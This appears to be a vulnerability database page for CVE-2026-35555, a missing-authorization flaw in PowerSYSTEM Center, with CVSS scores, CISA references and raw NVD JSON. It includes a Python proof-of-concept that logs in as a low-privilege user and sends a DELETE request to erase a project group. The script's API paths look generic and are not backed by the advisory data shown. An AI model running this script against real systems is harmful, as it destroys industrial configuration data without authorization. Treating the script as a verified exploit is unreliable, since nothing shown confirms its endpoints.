CVE-2026-35555

Description

PowerSYSTEM Center feature for device project groups allows an authenticated user with limited permissions to perform an unauthorized deletion of project groups.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L

Configurations (Affected Products)

No configuration data available.

PowerSYSTEM Center (具体受影响版本请参考厂商公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_host = "https://<target_ip>"
project_group_id = "12345"  # ID of the target project group
login_url = f"{target_host}/api/login"
delete_url = f"{target_host}/api/project-groups/{project_group_id}"

# Low privilege user credentials
credentials = {
    "username": "low_priv_user",
    "password": "user_password"
}

session = requests.Session()

try:
    # Step 1: Authenticate as low privilege user
    print("[*] Attempting to login...")
    auth_resp = session.post(login_url, data=credentials)
    
    if auth_resp.status_code == 200:
        print("[+] Login successful.")
        
        # Step 2: Send unauthorized deletion request
        # The vulnerability allows this user to delete the group without admin rights
        print(f"[*] Sending deletion request for project group {project_group_id}...")
        delete_resp = session.delete(delete_url)
        
        if delete_resp.status_code == 200 or delete_resp.status_code == 204:
            print(f"[+] Exploit successful! Project group {project_group_id} has been deleted.")
        else:
            print(f"[-] Deletion failed. Status Code: {delete_resp.status_code}")
            print(delete_resp.text)
    else:
        print("[-] Login failed. Check credentials.")
        
except Exception as e:
    print(f"[!] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35555
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35555
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35555/
[4] VulDB https://vuldb.com/cve/CVE-2026-35555
[5] https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-132-02.json
[6] https://www.cisa.gov/news-events/ics-advisories/icsa-26-132-02

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35555", "sourceIdentifier": "[email protected]", "published": "2026-05-12T22:16:33.630", "lastModified": "2026-05-13T15:52:56.850", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "PowerSYSTEM Center feature for device project groups allows an authenticated user with limited permissions to perform an unauthorized deletion of project groups."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-132-02.json", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-132-02", "source": "[email protected]"}]}}